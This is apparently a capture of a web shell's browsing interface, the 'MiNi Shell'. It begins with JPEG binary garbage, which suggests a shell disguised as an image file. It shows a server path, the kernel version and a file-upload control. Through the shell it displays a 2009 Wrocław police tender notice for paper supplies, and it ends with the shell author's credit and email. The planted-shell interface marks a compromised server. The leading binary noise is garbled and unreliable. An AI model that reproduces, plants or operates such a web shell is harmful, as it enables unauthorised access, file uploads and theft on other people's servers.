JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090506/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090506/71751-N-2009.html

<p class="kh_header"><b>Wrocław: Dostawa papieru dla KWP we Wrocławiu, KMP, KPP województwa dolnośląskiego oraz jednostek podległych KGP z siedzibą we Wrocławiu.</b><br>
<b>Numer ogłoszenia: 71751 - 2009; data zamieszczenia: 06.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Komenda Wojewódzka Policji we Wrocławiu , ul Podwale 31-33, 50-040 Wrocław, woj. dolnośląskie, tel. (071) 340 38 00, faks (071) 782 41 71.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.dolnoslaska.policja.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa papieru dla KWP we Wrocławiu, KMP, KPP województwa dolnośląskiego oraz jednostek podległych KGP z siedzibą we Wrocławiu..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> a)	Przedmiotem zamówienia jest dostawa papieru dla KWP we Wrocławiu, KMP, KPP województwa dolnośląskiego oraz jednostek podległych KGP z siedzibą we Wrocławiu.
b)	Dostawa będzie realizowana do obiektów wskazanych w załączniku numer 1 do istotnych postanowień umowy.
c)	Postępowanie zostało podzielone na 4 części odpowiadające niżej określonym rodzajom papieru:
- część I postępowania: dostawa papieru offset / maszynowego 80 g o formacie A-4 i A - 3 w ilościach i o właściwościach określonych w załączniku numer 1a do specyfikacji istotnych warunków zamówienia,
- część II postępowania: dostawa papieru ksero 80 g o formacie A-4 i A - 3 w ilościach i o właściwościach określonych w załączniku numer 1b do specyfikacji istotnych warunków zamówienia,
- część III postępowania: dostawa papieru pakowego typu NATRON o formacie A-1 w ilościach i o właściwościach określonych w załączniku numer 1c do specyfikacji istotnych warunków zamówienia,
- część IV postępowania: dostawa papieru do faksów 80 g o formacie A-4 w ilościach i o właściwościach określonych w załączniku numer 1d do specyfikacji istotnych warunków zamówienia,.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 30.19.76.30-1, 30.19.76.44-2, 37.82.39.00-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W ubieganiu się o udzielenie zamówienia mogą uczestniczyć wykonawcy, którzy spełniają poniższe warunki oraz złożą oświadczenie o ich spełnianiu: 
                         
1.	Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
2.	Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, tj.:
wykonali, w okresie ostatnich 3 lat (przed dniem wszczęcia postępowania o udzielenie zamówienia), a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, dostawy odpowiadające swoim rodzajem i wartością dostawom stanowiącym przedmiot zamówienia, tzn.:
a)	w przypadku, gdy wykonawca składa ofertę w części I postępowania: Zamawiający wymaga od Wykonawców wykazania doświadczenia zawodowego obejmującego wykonanie min. jednej dostawy papieru* (dostawy realizowanej na podstawie jednej umowy na rzecz jednego odbiorcy), której wartość nie była niższa niż 19 000,00 zł./brutto.
b)	w przypadku, gdy wykonawca składa ofertę w części II postępowania: Zamawiający wymaga od Wykonawców wykazania doświadczenia zawodowego obejmującego wykonanie min. jednej dostawy papieru* (dostawy realizowanej na podstawie jednej umowy na rzecz jednego odbiorcy), której wartość nie była niższa niż 260 000,00 zł./brutto.
c)	w przypadku, gdy wykonawca składa ofertę w części III postępowania: Zamawiający wymaga od Wykonawców wykazania doświadczenia zawodowego obejmującego wykonanie min. jednej dostawy papieru* (dostawy realizowanej na podstawie jednej umowy na rzecz jednego odbiorcy), której wartość nie była niższa niż 400,00 zł./brutto.
d)	w przypadku, gdy wykonawca składa ofertę w części IV postępowania: Zamawiający wymaga od Wykonawców wykazania doświadczenia zawodowego obejmującego wykonanie min. jednej dostawy papieru* (dostawy realizowanej na podstawie jednej umowy na rzecz jednego odbiorcy), której wartość nie była niższa niż 20 000,00 zł./brutto.
e)	W przypadku, gdy wykonawca składa ofertę w więcej niż jednej części postępowania: Zamawiający wymaga od Wykonawców wykazania doświadczenia zawodowego obejmującego ilość i wartość dostaw określonych dla części postępowania, na które wykonawca składa ofertę (np. w przypadku, gdy wykonawca składa ofertę we wszystkich czterech częściach postępowania, Zamawiający wymaga wykazania doświadczenia zawodowego obejmującego realizację min. czterech dostaw - dostaw realizowanych na podstawie czterech odrębnych umów - których wartości nie były niższe niż: 19 000,00 zł./brutto, 260 000,00 zł./brutto, 400,00 zł./brutto, 20 000,00 zł./brutto).

 *przy ocenie spełniania ww. nie wymaga się zachowania tożsamości rodzaju papieru.

3.	Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
4.	Nie podlegają wykluczeniu z ubiegania się o udzielenie zamówienia publicznego.
Dla potwierdzenia spełniania powyższych warunków wykonawca winien złożyć oświadczenie - załącznik nr 3 do SIWZ.  
Zamawiający dokona oceny spełnienia warunków udziału w postępowaniu metodą spełnia - nie spełnia, na podstawie złożonych oświadczeń i dokumentów..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia spełniania warunków udziału w postępowaniu wykonawcy winni dostarczyć oświadczenie o ich spełnianiu oraz niżej wymienione dokumenty:
I. W celu potwierdzenia , że wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy zamawiający żąda dołączenia do oferty następujących dokumentów : 

a)	aktualnego odpisu z właściwego rejestru albo zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
b)	aktualnej informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4 do pkt 8, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
c)	aktualnej informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt. 9 wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert ( dot. podmiotów zbiorowych),
- Wykonawca, który ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej:
Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, 
1. zamiast dokumentów , o których mowa w pkt a, c składa dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzające odpowiednio, że : 
-	nie otwarto jego likwidacji ani nie ogłoszono upadłości (dokument ten powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert)
-	nie orzeczono wobec niego zakazu ubiegania się o zamówienie (dokument ten powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert),
2. zamiast dokumentów , o których mowa w pkt b - składa zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy (dokument ten powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert)
3. jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt 1 i 2, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania (przepisy pkt 1 i 2 dotyczące okresów z którymi wiąże się aktualność dokumentów stosuje się odpowiednio).

II. W celu potwierdzenia opisanego przez zamawiającego warunku posiadania przez Wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, zamawiający żąda dołączenia do oferty następujących dokumentów: 
a)	wykazu wykonanych dostaw w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością dostawom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz z załączeniem dokumentów potwierdzających, że te dostawy zostały wykonane należycie.

Załączony do oferty wykaz wykonanych dostaw i dokumenty potwierdzające ich należyte wykonanie powinny obejmować w szczególności dostawę / dostawy, o których mowa w Rozdziale VII pkt 1 ppkt 2 SIWZ.

Wzór wykazu stanowi załącznik numer 6 do SIWZ

Oświadczenia potwierdzające że oferowane dostawy odpowiadają wymaganiom określonym przez Zamawiającego.

Wykonawcy ubiegający się o udzielenie zamówienia winni złożyć następujące oświadczenia, potwierdzające, iż oferowany przez nich papier spełnia wymagania określone przez zamawiającego:
1.	Ryza papieru zawiera 500 arkuszy papieru,
2.	Papier offset / maszynowy jest to papier bezpyłowy o gramaturze 80 g/m2 ,
3.	Dostarczony papier będzie posiadać na wszystkich opakowaniach trwałe oznakowanie określające producenta, typ, format i gramaturę.
4.	Papier ksero jest to papier typu Pollux lub inny o nie gorszych parametrach, bezpyłowy o gramaturze 80 g/m2 ,
5.	Papier pakowy typu NATRON jest papierem siarczanowym, jednostronnie gładkim, szarym bądź szarobrązowym, o gramaturze nie mniejszej niż 40 g/m2 i nie większej niż 120 g/m2 , pakowanym w rulonach o wadze 1 kg i formacie A-1,
6.	Papier do faksów typu A-4 jest to papier typu Pollux lub inny o nie gorszych parametrach, bezpyłowy o gramaturze 80 g/m2 ,

W celu potwierdzenia spełniania przez oferowane dostawy wymagań określonych przez Zamawiającego Wykonawca winien złożyć oświadczenie o spełnianiu tych wymagań. Treść oświadczeń została zamieszczona w załącznikach numer 1 do specyfikacji istotnych warunków zamówienia (odpowiednio do części na które wykonawca składa ofertę).

Dokumenty potwierdzające że oferowane dostawy odpowiadają wymaganiom określonym przez Zamawiającego.

Zgodnie z §3 ust. 1 Rozporządzenia Prezesa Rady Ministrów z dnia 19.05.2006 r. w sprawie rodzaju dokumentów jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz. U. z dnia 24.05.2006 r. Nr 87 poz. 605, Dz. U. z dnia 16.10.2008 r., Nr 188, poz. 1155)  od wykonawców ubiegających się o przyznanie zamówienia wymagane jest, w celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym przez Zamawiającego przedstawienie:
1.	próbek oferowanego asortymentu, po 1 egzemplarzu, kartce, sztuce, każdej z pozycji określonej w załącznikach nr 1 do SIWZ (odpowiednio do części na które Wykonawca składa ofertę). Otrzymane próbki Zamawiający podda ocenie czy spełniają wymagania techniczne i jakościowe opisane w załącznikach numer 1 do Specyfikacji Istotnych Warunków Zamówienia. Jednocześnie Zamawiający zobowiązuje się do zwrotu przekazanych próbek asortymentu niezwłocznie po zakończeniu postępowania o udzielenie zamówienia publicznego. (Zaleca się, by Wykonawca wskazał, na każdej z dołączonych próbek, którego z rodzajów asortymentu próbka dotyczy oraz zaleca się, by Wykonawca dołączył do próbek listę stanowiącą zbiorcze zestawienie próbek dołączonych do oferty.),
2.	informacje dotyczące producenta, typu oferowanego papieru wraz z opisem jego parametrów technicznych. (Zamawiający wymaga dołączenia karty charakterystyki, bądź wydruku ze strony internetowej producenta podpisanej przez Wykonawcę).</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.dolnoslaska.policja.gov.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Komenda Wojewódzka Policji we Wrocławiu
50-040 Wrocław, ul. Podwale 31-33
Wydział Zamówień Publicznych i Funduszy Pomocowych KWP.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.05.2009 godzina 09:00, miejsce: Komenda Wojewódzka Policji we Wrocławiu
50-040 Wrocław, ul. Podwale 31-33
Punkt Obsługi Klienta.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa papieru offset / maszynowego 80 g o formacie A-4 i A - 3.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa papieru offset / maszynowego 80 g o formacie A-4 i A - 3 w ilościach i o właściwościach określonych w załączniku numer 1a do specyfikacji istotnych warunków zamówienia.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.76.30-1, 30.19.76.44-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa papieru ksero 80 g o formacie A-4 i A - 3.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa papieru ksero 80 g o formacie A-4 i A - 3 w ilościach i o właściwościach określonych w załączniku numer 1b do specyfikacji istotnych warunków zamówienia.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.76.44-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa papieru pakowego typu NATRON o formacie A-1.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa papieru pakowego typu NATRON o formacie A-1 w ilościach i o właściwościach określonych w załączniku numer 1c do specyfikacji istotnych warunków zamówienia.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 37.82.39.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa papieru do faksów 80 g o formacie A-4.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa papieru do faksów 80 g o formacie A-4 w ilościach i o właściwościach określonych w załączniku numer 1d do specyfikacji istotnych warunków zamówienia.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.76.30-1, 30.19.76.44-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com